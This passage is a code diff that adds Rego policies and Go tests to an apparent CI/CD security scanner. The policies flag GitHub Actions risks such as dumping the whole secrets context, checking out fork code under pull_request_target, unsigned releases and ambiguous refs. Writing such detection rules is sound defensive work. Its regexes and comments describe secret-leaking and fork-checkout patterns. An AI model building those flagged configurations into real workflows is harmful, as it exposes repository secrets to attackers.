+		"message": sprintf("job %q references %q β published advisories: %s", [job.name, action.uses, _format_advisories(action.metadata.advisories)]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+# _format_advisories renders each GHSA ID next to its canonical
+# advisory URL so reviewers can open the page with a single click
+# from the terminal. Example output for two IDs:
+#
+#   GHSA-mrrh-fwg8-r2c3 (https://github.com/advisories/GHSA-mrrh-fwg8-r2c3),
+#   GHSA-abcd-efgh-ijkl (https://github.com/advisories/GHSA-abcd-efgh-ijkl)
+_format_advisories(ids) := out if {
+	decorated := [link |
+		some id in ids
+		link := sprintf("%s (https://github.com/advisories/%s)", [id, id])
+	]
+	out := concat(", ", decorated)
+}
diff --git a/policies/missing_concurrency.rego b/policies/missing_concurrency.rego
new file mode 100644
index 0000000..a520cce
--- /dev/null
+++ b/policies/missing_concurrency.rego
@@ -0,0 +1,49 @@
+# missing-concurrency β flag GitHub Actions workflows that declare no
+# `concurrency:` block at either the workflow level or on any of
+# their jobs. Concurrent triggers on the same ref (rebases,
+# force-pushes, CI retries) then race on caches, artefact uploads,
+# and external state, and β worse β can deploy stale output by
+# overtaking a newer run. Declaring concurrency (usually
+# grouped by `${{ github.workflow }}-${{ github.ref }}`) makes the
+# later run the one that lands.
+#
+# The policy aggregates by originFile: a workflow is fine as soon as
+# ONE of its jobs β or the workflow header β declares concurrency.
+package missing_concurrency
+
+import rego.v1
+
+# One finding per uncovered workflow file; the helper below is a set,
+# so multiple jobs from the same file collapse into a single finding.
+deny contains finding if {
+	input.pipeline.provider == "github"
+	some file in _workflow_files_missing_concurrency
+	finding := {
+		"code": "ISSUE-602",
+		"severity": "medium",
+		"message": sprintf("workflow file %q declares no concurrency group β concurrent runs will race on caches, deploys and artefacts", [file]),
+		"file": file,
+	}
+}
+
+_workflow_files_missing_concurrency contains file if {
+	# Collect every workflow file seen, then subtract the ones that
+	# are covered either at workflow or job level. Jobs without an
+	# originFile (empty string) are skipped entirely.
+	some i
+	job := input.pipeline.jobs[i]
+	file := job.originFile
+	file != ""
+	not _workflow_covered(file)
+}
+
+# Covered case 1: the workflow header declares a concurrency group
+# (flag is replicated onto every job of the file by the collector).
+_workflow_covered(file) if {
+	some i
+	job := input.pipeline.jobs[i]
+	job.originFile == file
+	job.workflowHasConcurrency
+}
+
+# Covered case 2: at least one job in the file declares its own
+# concurrency block.
+_workflow_covered(file) if {
+	some i
+	job := input.pipeline.jobs[i]
+	job.originFile == file
+	job.jobHasConcurrency
+}
diff --git a/policies/overprovisioned_secrets.rego b/policies/overprovisioned_secrets.rego
new file mode 100644
index 0000000..3e17cb9
--- /dev/null
+++ b/policies/overprovisioned_secrets.rego
@@ -0,0 +1,57 @@
+# overprovisioned-secrets β flag workflows that serialise the entire
+# GitHub Actions `secrets` context with `toJson(secrets)` /
+# `toJSON(secrets)` and pass it into a step. The JSON payload contains
+# every repository, organisation and environment secret the job has
+# access to; once the string lands in a run script, an env binding or
+# a `with:` input it can leak through logs, third-party actions, or
+# whatever downstream consumer the step invokes. Even a single
+# `echo "$SECRETS"` has been enough in past incidents β GitHub's log
+# redaction works on known secret values, not on a JSON blob derived
+# from them.
+#
+# The policy looks at three sinks:
+# - job scripts (jobs.<job_id>.steps[].run)
+# - job env bindings (jobs.<job_id>.env + steps[].env rolled up)
+# - action inputs (jobs.<job_id>.steps[].with[*])
+# A finding fires as soon as one of them references the full secrets
+# context. Scoped references like `${{ secrets.NPM_TOKEN }}` are
+# ignored β they name a specific secret and are the intended pattern.
+package overprovisioned_secrets
+
+import rego.v1
+
+# Matches `toJson(secrets)`, `toJSON(secrets)`, and their whitespace-
+# permissive variants. The wrapping `${{ }}` is not required for the
+# match β some workflows build the string with `fromJSON(toJson(...))`
+# chains and we want to catch those too. Note regex.match performs an
+# unanchored substring search, so the pattern fires anywhere in the
+# value.
+secrets_dump_pattern := `(?i)to\s*json\s*\(\s*secrets\s*\)`
+
+deny contains finding if {
+	some i
+	job := input.pipeline.jobs[i]
+	_job_dumps_secrets(job)
+	finding := {
+		"code": "ISSUE-301",
+		"severity": "critical",
+		"message": sprintf("job %q exports the entire secrets context via toJson(secrets) β pass secrets by name instead", [job.name]),
+		"job": job.name,
+	}
+}
+
+# Sink 1: run scripts.
+_job_dumps_secrets(job) if {
+	some k
+	regex.match(secrets_dump_pattern, job.scripts[k])
+}
+
+# Sink 2: env bindings (job-level env plus per-step env, rolled up
+# into job.variables by the collector).
+_job_dumps_secrets(job) if {
+	some _, value in job.variables
+	regex.match(secrets_dump_pattern, value)
+}
+
+# Sink 3: action inputs. Non-string `with:` values (bools, numbers)
+# are skipped β they cannot carry an expression.
+_job_dumps_secrets(job) if {
+	some k
+	action := job.uses[k]
+	some _, value in action.with
+	is_string(value)
+	regex.match(secrets_dump_pattern, value)
+}
diff --git a/policies/placeholder.rego b/policies/placeholder.rego
new file mode 100644
index 0000000..fb93a63
--- /dev/null
+++ b/policies/placeholder.rego
@@ -0,0 +1,5 @@
+# Phase 1d placeholder: ensures //go:embed *.rego has at least one file to
+# include so the package compiles. This policy declares no rules, so the
+# engine queries against it return zero findings. Delete or replace once
+# a real policy ships.
+package placeholder
diff --git a/policies/pull_request_target_head_checkout.rego b/policies/pull_request_target_head_checkout.rego
new file mode 100644
index 0000000..8f24582
--- /dev/null
+++ b/policies/pull_request_target_head_checkout.rego
@@ -0,0 +1,51 @@
+# pull-request-target-head-checkout β flag the precise vector behind
+# the March 2025 tj-actions/changed-files compromise (CVE-2025-30066):
+# a workflow triggered by `pull_request_target` that calls
+# actions/checkout with a `ref:` pointing at the PR head
+# (github.event.pull_request.head.sha, github.head_ref, β¦).
+#
+# pull_request_target already fires the broader dangerous-triggers
+# check (ISSUE-414) β this rule pinpoints the exploitable
+# configuration where base-repo secrets AND fork-controlled code
+# coexist in the same run. The severity is critical and distinct so
+# an operator can prioritise it above the general trigger warning.
+package pull_request_target_head_checkout
+
+import rego.v1
+
+# Refs known to resolve to attacker-controlled content under a
+# pull_request_target trigger. regex.match does an unanchored search,
+# so these fire when the token appears anywhere inside the `ref:`
+# expression.
+fork_ref_patterns := [
+	`github\.event\.pull_request\.head\.sha`,
+	`github\.event\.pull_request\.head\.ref`,
+	`github\.head_ref`,
+	# PR numbers are used to build refs/pull/<n>/head (and /merge),
+	# both of which contain fork-controlled code. The number is
+	# reachable through two context paths; cover both spellings.
+	`github\.event\.number`,
+	`github\.event\.pull_request\.number`,
+]
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	_under_pull_request_target(job)
+	action := job.uses[j]
+	# Remote action refs always carry an @<ref> suffix, so prefix
+	# matching on "actions/checkout@" covers every pin style.
+	startswith(action.uses, "actions/checkout@")
+	# No explicit `ref:` means checkout defaults to the base commit,
+	# which is safe under pull_request_target β the undefined lookup
+	# correctly makes the rule fail silently in that case.
+	ref := action.with.ref
+	is_string(ref)
+	_ref_points_at_pr_head(ref)
+	finding := {
+		"code": "ISSUE-415",
+		"severity": "critical",
+		"message": sprintf("job %q runs under pull_request_target AND checks out the PR head (ref=%q) β base-repo secrets and fork-controlled code in the same run (tj-actions / CVE-2025-30066 pattern)", [job.name, ref]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+_under_pull_request_target(job) if {
+	some t in job.triggers
+	t == "pull_request_target"
+}
+
+_ref_points_at_pr_head(ref) if {
+	some p in fork_ref_patterns
+	regex.match(p, ref)
+}
diff --git a/policies/ref_confusion.rego b/policies/ref_confusion.rego
new file mode 100644
index 0000000..bb328f3
--- /dev/null
+++ b/policies/ref_confusion.rego
@@ -0,0 +1,29 @@
+# ref-confusion β flag action references whose symbolic name exists
+# upstream as BOTH a tag and a branch. GitHub Actions resolves tags
+# first, so the reference works today; but the ambiguity is a
+# supply-chain landmine: a maintainer who later ships a breaking
+# change on the branch, a workflow typo that drops the expected
+# ref prefix, or a tag deletion, each silently swaps which of the
+# two revisions executes.
+#
+# The collector does the cross-existence probe via the GitHub API.
+# When the probe returns RefIsAmbiguous=true, we emit the finding.
+# Degraded mode (no API auth) leaves the field zero-valued and the
+# rule stays silent to avoid false positives.
+package ref_confusion
+
+import rego.v1
+
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	# Explicit == true: in degraded mode metadata (or the field) is
+	# absent and the expression is undefined, keeping the rule silent
+	# as documented above.
+	action.metadata.refIsAmbiguous == true
+	finding := {
+		"code": "ISSUE-113",
+		"severity": "medium",
+		"message": sprintf("job %q references %q β the ref name resolves as both a tag AND a branch upstream, which revision runs is ambiguous", [job.name, action.uses]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
diff --git a/policies/ref_version_mismatch.rego b/policies/ref_version_mismatch.rego
new file mode 100644
index 0000000..2864528
--- /dev/null
+++ b/policies/ref_version_mismatch.rego
@@ -0,0 +1,78 @@
+# ref-version-mismatch β flag `@<sha> # vX.Y.Z` pins where the SHA
+# does not correspond to the tag named in the trailing comment. The
+# comment is the reviewer's trust signal; if the SHA says one version
+# and the comment says another, the review is misled.
+#
+# Uses the collector's API-resolved metadata: when the collector sees
+# a trailing comment with a version token, it queries the upstream
+# repository for the SHA that version resolves to (CommentTagSha).
+# The policy compares that SHA to the one actually pinned in `uses:`.
+#
+# Two ruled cases:
+# 1. Pinned ref is a SHA, comment names a version, the version
+# resolves to a different SHA. The classic mismatch.
+# 2. Pinned ref is a tag, the comment names a different version.
+# Caught by string comparison; the API data is not needed here
+# so the rule still fires in degraded (offline) mode.
+package ref_version_mismatch
+
+import rego.v1
+
+sha_pattern := `^[0-9a-f]{40}$`
+
+# Anchored: the whole comment must be a bare version token (optional
+# leading `v`, optional pre-release suffix), otherwise no extraction.
+version_comment_pattern := `^\s*v?(\d+(?:\.\d+)*(?:-[A-Za-z0-9.-]+)?)\s*$`
+
+# Case 1 β SHA pin, comment-named tag resolved to a different SHA.
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	# metadata and both API-resolved fields must be present; absent
+	# (degraded mode) the rule fails silently.
+	action.metadata
+	action.metadata.commentVersion != ""
+	action.metadata.commentTagSha != ""
+	ref := _ref_of(action.uses)
+	regex.match(sha_pattern, ref)
+	action.metadata.commentTagSha != ref
+	finding := {
+		"code": "ISSUE-110",
+		"severity": "medium",
+		"message": sprintf("job %q pins %q but comment %q names tag %q which resolves to %q β reviewers will misread the version", [job.name, action.uses, action.comment, action.metadata.commentVersion, action.metadata.commentTagSha]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+# Case 2 β tag pin, comment names a different tag. Offline-safe.
+# NOTE(review): refKind is read from action.metadata, which the header
+# describes as API-resolved β confirm the collector populates refKind
+# syntactically (without API access), otherwise this case is NOT
+# offline-safe as claimed.
+deny contains finding if {
+	some i, j
+	job := input.pipeline.jobs[i]
+	action := job.uses[j]
+	action.comment != ""
+	action.metadata.refKind == "tag"
+	ref := _ref_of(action.uses)
+	cv := _comment_version(action.comment)
+	cv != ""
+	_strip_v(ref) != _strip_v(cv)
+	finding := {
+		"code": "ISSUE-110",
+		"severity": "medium",
+		"message": sprintf("job %q pins tag %q with comment %q β ref and comment name different versions", [job.name, action.uses, action.comment]),
+		"job": job.name,
+		"line": object.get(action, "line", 0),
+	}
+}
+
+# _ref_of returns everything after the first "@" in a uses reference,
+# or is undefined when there is no "@" (local / docker-less refs).
+_ref_of(uses) := ref if {
+	idx := indexof(uses, "@")
+	idx >= 0
+	# substring with length -1 yields the remainder of the string.
+	ref := substring(uses, idx + 1, -1)
+}
+
+# _comment_version extracts the bare version token from a trailing
+# comment. Use capture group 1 (m[0][1]) rather than the full match
+# (m[0][0]): the full match retains the `\s*` padding and the optional
+# leading "v", so a comment like " v4.1.0" would defeat _strip_v and
+# produce a false mismatch in Case 2.
+_comment_version(comment) := v if {
+	m := regex.find_all_string_submatch_n(version_comment_pattern, comment, 1)
+	count(m) > 0
+	v := m[0][1]
+}
+
+# Normalise "v1.2.3" / "1.2.3" to the same comparable form.
+_strip_v(s) := trimmed if {
+	trimmed := trim_prefix(s, "v")
+}
diff --git a/policies/release_workflow_unsigned.rego b/policies/release_workflow_unsigned.rego
new file mode 100644
index 0000000..3963be5
--- /dev/null
+++ b/policies/release_workflow_unsigned.rego
@@ -0,0 +1,122 @@
+# release-workflow-unsigned β flag release / publish jobs that
+# produce artefacts without any signing step. Consumers of the
+# release then have no cryptographic handle to verify the artefact
+# was built by the expected pipeline rather than tampered with
+# along the way (cache poisoning, compromised runner, repository
+# takeover). Signing (Sigstore cosign, GPG, SLSA provenance, npm
+# --provenance) turns "I trust this came from that repo" into a
+# falsifiable statement.
+#
+# Fires only when the job is a release / publish context (trigger
+# `release`, or invokes a recognised publish action) AND none of its
+# steps invoke a recognised signing action. OIDC-based publish
+# actions (`pypa/gh-action-pypi-publish` with trusted publishing,
+# `npm publish --provenance`) are considered self-signing.
+package release_workflow_unsigned
+
+import rego.v1
+
+# Actions whose presence marks a job as a publish / release context.
+publish_actions := {
+	"pypa/gh-action-pypi-publish",
+	"JS-DevTools/npm-publish",
+	"softprops/action-gh-release",
+	"ncipollo/release-action",
+	"goreleaser/goreleaser-action",
+	"docker/build-push-action",
+}
+
+# Actions whose presence counts as a signing step.
+signing_actions := {
+	"sigstore/cosign-installer",
+	"sigstore/gh-action-sigstore-python",
+	"crazy-max/ghaction-import-gpg",
+	"slsa-framework/slsa-github-generator",
+	"philips-labs/slsa-provenance-action",
+	"sigstore/sigstore-java",
+	# GitHub-native Sigstore attestation actions (keyless OIDC
+	# signing into the Rekor transparency log). `attest-build-provenance`
+	# is the SLSA provenance flavour; `attest-sbom` signs SBOMs; the
+	# base `attest` action signs arbitrary predicates.
+	"actions/attest-build-provenance",
+	"actions/attest-sbom",
+	"actions/attest",
+}
+
+# Self-signing publish contexts: the publish action itself handles
+# provenance when the right inputs are passed, so absence of a
+# dedicated signing step is expected.
+self_signing_publish_actions := {
+	"pypa/gh-action-pypi-publish", # trusted publishing attaches provenance
+}
+
+deny contains finding if {
+	some i
+	job := input.pipeline.jobs[i]
+	_is_release_context(job)
+	not _job_self_signs(job)
+	not _job_runs_signing_step(job)
+	finding := {
+		"code": "ISSUE-112",
+		"severity": "medium",
+		"message": sprintf("job %q publishes release artefacts without any signing step β add cosign / sigstore / GPG alongside the publish action", [job.name]),
+		"job": job.name,
+	}
+}
+
+# Release context case 1: the workflow runs on the `release` trigger.
+_is_release_context(job) if {
+	some t in job.triggers
+	t == "release"
+}
+
+# Release context case 2: the job invokes a recognised publish action.
+_is_release_context(job) if {
+	some k
+	action := job.uses[k]
+	_is_publish_action(action.uses)
+}
+
+_is_publish_action(uses) if {
+	some prefix in publish_actions
+	startswith(uses, sprintf("%s@", [prefix]))
+}
+
+# Defensive: also match a bare, unversioned reference.
+_is_publish_action(uses) if {
+	some prefix in publish_actions
+	uses == prefix
+}
+
+_job_runs_signing_step(job) if {
+	some k
+	action := job.uses[k]
+	some prefix in signing_actions
+	startswith(action.uses, sprintf("%s@", [prefix]))
+}
+
+_job_runs_signing_step(job) if {
+	some k
+	action := job.uses[k]
+	some prefix in signing_actions
+	action.uses == prefix
+}
+
+# `npm publish --provenance` in a run: script attaches Sigstore
+# provenance, so treat it as a signing step.
+_job_runs_signing_step(job) if {
+	some k
+	regex.match(`npm\s+publish\s.*--provenance`, job.scripts[k])
+}
+
+# cosign / gpg --detach-sign invoked directly in a run: script.
+_job_runs_signing_step(job) if {
+	some k
+	regex.match(`\bcosign\s+sign\b`, job.scripts[k])
+}
+
+_job_runs_signing_step(job) if {
+	some k
+	regex.match(`\bgpg\s+--?detach-?sign\b`, job.scripts[k])
+}
+
+_job_self_signs(job) if {
+	some k
+	action := job.uses[k]
+	some prefix in self_signing_publish_actions
+	startswith(action.uses, sprintf("%s@", [prefix]))
+}
diff --git a/policies/rules_test.go b/policies/rules_test.go
new file mode 100644
index 0000000..9e6e9a5
--- /dev/null
+++ b/policies/rules_test.go
@@ -0,0 +1,2934 @@
+package policies_test
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "path/filepath"
+ "sort"
+ "strings"
+ "testing"
+
+ "gopkg.in/yaml.v2"
+
+ "github.com/getplumber/plumber/collector"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/policies"
+)
+
+// reservedTopLevelKeys are GitLab CI top-level keys that must not be
+// interpreted as jobs by the mini-parser below. Any top-level mapping
+// key NOT in this set is treated as a job definition.
+var reservedTopLevelKeys = map[string]struct{}{
+	"stages":        {},
+	"variables":     {},
+	"default":       {},
+	"include":       {},
+	"workflow":      {},
+	"image":         {},
+	"services":      {},
+	"before_script": {},
+	"after_script":  {},
+	"cache":         {},
+}
+
+// parseGitLabCI is a deliberately narrow parser that extracts only what the
+// currently ported rules need (jobs + jobs.*.image). It is the test-time
+// substitute for the full collector, which depends on the GitLab API.
+// Limitations: no include/extend resolution, no default image propagation,
+// no variable expansion. Extend as new rules require it.
+//
+// NOTE(review): hidden job templates (top-level keys starting with ".")
+// are not filtered and land in the job list β confirm fixtures never rely
+// on them, or skip dot-prefixed keys here.
+func parseGitLabCI(t *testing.T, data []byte) *ir.NormalizedPipeline {
+	t.Helper()
+
+	var raw map[string]any
+	if err := yaml.Unmarshal(data, &raw); err != nil {
+		t.Fatalf("parse yaml: %v", err)
+	}
+
+	var jobs []ir.Job
+	for key, value := range raw {
+		if _, reserved := reservedTopLevelKeys[key]; reserved {
+			continue
+		}
+		// Non-mapping top-level values (scalars, lists) cannot be jobs.
+		section, ok := toStringMap(value)
+		if !ok {
+			continue
+		}
+		job := ir.Job{Name: key}
+		if img, ok := parseImageField(section["image"]); ok {
+			job.Image = &img
+		}
+		if svc := parseServicesField(section["services"]); len(svc) > 0 {
+			job.Services = svc
+		}
+		if vars := parseVariablesField(section["variables"]); len(vars) > 0 {
+			job.Variables = vars
+			// Fixtures are user-authored .gitlab-ci.yml files: every
+			// `variables:` block on a job is the project's own. Mirror
+			// the production collector by exposing them as
+			// LocalVariables too so policies that distinguish "user
+			// wrote this" from merged-in upstream see them.
+			job.LocalVariables = vars
+		}
+		if af, ok := section["allow_failure"].(bool); ok {
+			job.AllowFailure = af
+		}
+		if w, ok := section["when"].(string); ok {
+			job.When = w
+		}
+		if scripts := parseScriptsField(section["script"]); len(scripts) > 0 {
+			job.Scripts = scripts
+		}
+		jobs = append(jobs, job)
+	}
+
+	// Map iteration order is random; sort for deterministic test output.
+	sort.Slice(jobs, func(i, j int) bool { return jobs[i].Name < jobs[j].Name })
+	return &ir.NormalizedPipeline{Provider: ir.ProviderGitLab, Jobs: jobs}
+}
+
+// parseServicesField accepts the GitLab services polymorphic form:
+// list of strings or list of {name: β¦} maps. Unrecognised list items
+// are silently skipped.
+func parseServicesField(v any) []ir.Image {
+	list, ok := v.([]any)
+	if !ok {
+		return nil
+	}
+	out := make([]ir.Image, 0, len(list))
+	for _, item := range list {
+		switch s := item.(type) {
+		case string:
+			out = append(out, splitNameTag(s))
+		case map[any]any:
+			m, _ := toStringMap(s)
+			if name, ok := m["name"].(string); ok {
+				out = append(out, splitNameTag(name))
+			}
+		}
+	}
+	return out
+}
+
+// parseScriptsField normalises the GitLab script: block into a list.
+// Accepts both the single-string and the list-of-strings forms;
+// non-string list items are dropped.
+func parseScriptsField(v any) []string {
+	switch s := v.(type) {
+	case string:
+		return []string{s}
+	case []any:
+		out := make([]string, 0, len(s))
+		for _, item := range s {
+			if str, ok := item.(string); ok {
+				out = append(out, str)
+			}
+		}
+		return out
+	}
+	return nil
+}
+
+// parseVariablesField stringifies the variables map for policy consumption.
+// Non-string YAML scalars (bools, ints) are rendered with %v so policies
+// always see string values.
+func parseVariablesField(v any) map[string]string {
+	m, ok := toStringMap(v)
+	if !ok {
+		return nil
+	}
+	out := make(map[string]string, len(m))
+	for k, val := range m {
+		if s, ok := val.(string); ok {
+			out[k] = s
+			continue
+		}
+		out[k] = fmt.Sprintf("%v", val)
+	}
+	return out
+}
+
+// parseGitHubActions is the GitHub counterpart of parseGitLabCI. It walks
+// workflow `jobs.<job_id>.container`, which may be either a string shortcut
+// ("alpine:latest") or a map ({"image": "...", ...}), and maps each job to
+// the shared IR so policies remain provider-agnostic.
+// Limitations: `steps[].uses` and matrix strategies are not modeled yet.
+func parseGitHubActions(t *testing.T, data []byte) *ir.NormalizedPipeline {
+	t.Helper()
+
+	var raw map[string]any
+	if err := yaml.Unmarshal(data, &raw); err != nil {
+		t.Fatalf("parse yaml: %v", err)
+	}
+
+	jobsMap, ok := toStringMap(raw["jobs"])
+	if !ok {
+		t.Fatalf("workflow is missing a top-level jobs: mapping")
+	}
+
+	var jobs []ir.Job
+	for name, v := range jobsMap {
+		section, ok := toStringMap(v)
+		if !ok {
+			continue
+		}
+		job := ir.Job{Name: name}
+		if img, ok := parseGitHubContainer(section["container"]); ok {
+			job.Image = &img
+		}
+		if uses := parseGitHubStepsUses(section["steps"]); len(uses) > 0 {
+			job.Uses = uses
+		}
+		jobs = append(jobs, job)
+	}
+
+	// Deterministic order regardless of map iteration.
+	sort.Slice(jobs, func(i, j int) bool { return jobs[i].Name < jobs[j].Name })
+	return &ir.NormalizedPipeline{Provider: ir.ProviderGitHub, Jobs: jobs}
+}
+
+// parseGitHubContainer accepts both `container: "name:tag"` and
+// `container: { image: "name:tag" }`. Returns false when the field is
+// absent or has an unrecognised shape.
+func parseGitHubContainer(v any) (ir.Image, bool) {
+	switch c := v.(type) {
+	case string:
+		return splitNameTag(c), true
+	case map[any]any:
+		m, _ := toStringMap(c)
+		if img, ok := m["image"].(string); ok {
+			return splitNameTag(img), true
+		}
+	}
+	return ir.Image{}, false
+}
+
+// toStringMap normalizes the yaml.v2 untyped map form to map[string]any.
+// Non-string keys are dropped rather than reported.
+func toStringMap(v any) (map[string]any, bool) {
+	m, ok := v.(map[any]any)
+	if !ok {
+		return nil, false
+	}
+	out := make(map[string]any, len(m))
+	for k, vv := range m {
+		ks, ok := k.(string)
+		if !ok {
+			continue
+		}
+		out[ks] = vv
+	}
+	return out, true
+}
+
+// parseImageField accepts both the `image: "name:tag"` shorthand and the
+// `image: { name: "...", tag: "..." }` long form. Returns false when the
+// field is absent, has an unrecognised shape, or the long form lacks a
+// name.
+func parseImageField(v any) (ir.Image, bool) {
+	switch img := v.(type) {
+	case string:
+		return splitNameTag(img), true
+	case map[any]any:
+		m, _ := toStringMap(img)
+		name, _ := m["name"].(string)
+		tag, _ := m["tag"].(string)
+		if name == "" {
+			return ir.Image{}, false
+		}
+		if tag == "" && strings.Contains(name, ":") {
+			// Sometimes the whole reference lands in `name`.
+			return splitNameTag(name), true
+		}
+		return ir.Image{Name: name, Tag: tag}, true
+	default:
+		return ir.Image{}, false
+	}
+}
+
+// splitNameTag decomposes an OCI image reference into name plus tag or
+// digest. A ":" only separates a tag when it appears after the last
+// "/"; otherwise it is a registry port ("registry:5000/img") and the
+// whole reference is the name β the previous LastIndex-only check
+// mis-split port-qualified references without a tag.
+func splitNameTag(ref string) ir.Image {
+	// Digest form takes precedence: "alpine@sha256:..."
+	if at := strings.Index(ref, "@"); at > 0 {
+		return ir.Image{Name: ref[:at], Digest: ref[at+1:]}
+	}
+	if idx := strings.LastIndex(ref, ":"); idx > 0 && idx > strings.LastIndex(ref, "/") {
+		return ir.Image{Name: ref[:idx], Tag: ref[idx+1:]}
+	}
+	return ir.Image{Name: ref}
+}
+
+// TestIssue102_ImageMutableTag drives the embedded image_mutable_tag policy
+// against real CI/CD fixtures for both GitLab and GitHub. The same Rego
+// policy is used unchanged β only the test-time YAML β IR parser differs
+// per provider, which is the whole point of the multi-provider refactor.
+func TestIssue102_ImageMutableTag(t *testing.T) {
+	type fixture struct {
+		file            string
+		expectedJobHits []string
+	}
+	type providerSuite struct {
+		name     string
+		dir      string
+		parse    func(*testing.T, []byte) *ir.NormalizedPipeline
+		fixtures []fixture
+	}
+
+	suites := []providerSuite{
+		{
+			name:  "gitlab",
+			dir:   filepath.Join("testdata", "ISSUE-102", "gitlab"),
+			parse: parseGitLabCI,
+			fixtures: []fixture{
+				{"violation_latest.gitlab-ci.yml", []string{"deploy"}},
+				{"violation_wildcards.gitlab-ci.yml", []string{"ci"}},
+				{"clean.gitlab-ci.yml", nil},
+			},
+		},
+		{
+			name:  "github",
+			dir:   filepath.Join("testdata", "ISSUE-102", "github"),
+			parse: parseGitHubActions,
+			fixtures: []fixture{
+				{"violation_latest.workflow.yml", []string{"deploy"}},
+				{"violation_wildcards.workflow.yml", []string{"ci"}},
+				{"clean.workflow.yml", nil},
+			},
+		},
+	}
+
+	forbiddenTags := []string{"latest", "dev", "*-alpha"}
+	cfg := map[string]any{
+		"imageMutableTag": map[string]any{"forbiddenTags": forbiddenTags},
+	}
+
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	for _, suite := range suites {
+		for _, fx := range suite.fixtures {
+			t.Run(suite.name+"/"+fx.file, func(t *testing.T) {
+				path := filepath.Join(suite.dir, fx.file)
+				data, err := os.ReadFile(path)
+				if err != nil {
+					t.Fatalf("read fixture: %v", err)
+				}
+				pipeline := suite.parse(t, data)
+
+				findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+				if err != nil {
+					t.Fatalf("evaluate: %v", err)
+				}
+
+				hits := make([]string, 0, len(findings))
+				for _, f := range findings {
+					if f.Code != "ISSUE-102" {
+						continue
+					}
+					hits = append(hits, f.Job)
+				}
+				sort.Strings(hits)
+				// NOTE(review): sorts the fixture slice in place; the
+				// sibling tests sort a defensive copy instead. Harmless
+				// (each fixture is used once) but inconsistent.
+				sort.Strings(fx.expectedJobHits)
+				if !stringSlicesEqual(hits, fx.expectedJobHits) {
+					t.Fatalf("%s/%s: expected hits on %v, got %v",
+						suite.name, fx.file, fx.expectedJobHits, hits)
+				}
+			})
+		}
+	}
+}
+
+// TestIssue509_ExcessivePermissions drives the excessive_permissions
+// policy against real GitHub workflow fixtures. It uses the real
+// production collector (ScanGitHubWorkflows) rather than the test-time
+// parser to exercise the permissions propagation end-to-end.
+//
+// NOTE(review): the loop body is repeated almost verbatim in the
+// ISSUE-414/206/208 tests β a shared helper taking (issueCode,
+// testdataDir, cases) would collapse the four copies.
+func TestIssue509_ExcessivePermissions(t *testing.T) {
+	cases := []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{
+			fixture:      "violation_workflow_write_all.yml",
+			expectedHits: []string{"violation_workflow_write_all/publish"},
+		},
+		{
+			fixture:      "violation_job_write_all.yml",
+			expectedHits: []string{"violation_job_write_all/loose"},
+		},
+		{
+			fixture:      "clean_minimal.yml",
+			expectedHits: nil,
+		},
+	}
+
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			// Stage the fixture under a fake .github/workflows/ dir so
+			// ScanGitHubWorkflows can discover it unmodified.
+			tmp := t.TempDir()
+			wfDir := filepath.Join(tmp, ".github", "workflows")
+			if err := os.MkdirAll(wfDir, 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", "ISSUE-509", "github", tc.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+
+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+
+			hits := make([]string, 0, len(findings))
+			for _, f := range findings {
+				if f.Code != "ISSUE-509" {
+					continue
+				}
+				hits = append(hits, f.Job)
+			}
+			sort.Strings(hits)
+			// Sort a copy so the shared case table stays pristine.
+			expected := append([]string(nil), tc.expectedHits...)
+			sort.Strings(expected)
+			if !stringSlicesEqual(hits, expected) {
+				t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+			}
+		})
+	}
+}
+
+// TestIssue414_DangerousTriggers drives the dangerous_triggers policy
+// against fixtures covering the two primary risky trigger types and
+// the safe baseline. As for ISSUE-509 the test exercises the real
+// production collector (ScanGitHubWorkflows) rather than the test-time
+// parser. See TestIssue509_ExcessivePermissions for the staging pattern.
+func TestIssue414_DangerousTriggers(t *testing.T) {
+	cases := []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{
+			fixture:      "violation_pull_request_target.yml",
+			expectedHits: []string{"violation_pull_request_target/preview"},
+		},
+		{
+			fixture:      "violation_workflow_run.yml",
+			expectedHits: []string{"violation_workflow_run/post"},
+		},
+		{
+			fixture:      "clean_pull_request.yml",
+			expectedHits: nil,
+		},
+	}
+
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			tmp := t.TempDir()
+			wfDir := filepath.Join(tmp, ".github", "workflows")
+			if err := os.MkdirAll(wfDir, 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", "ISSUE-414", "github", tc.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+
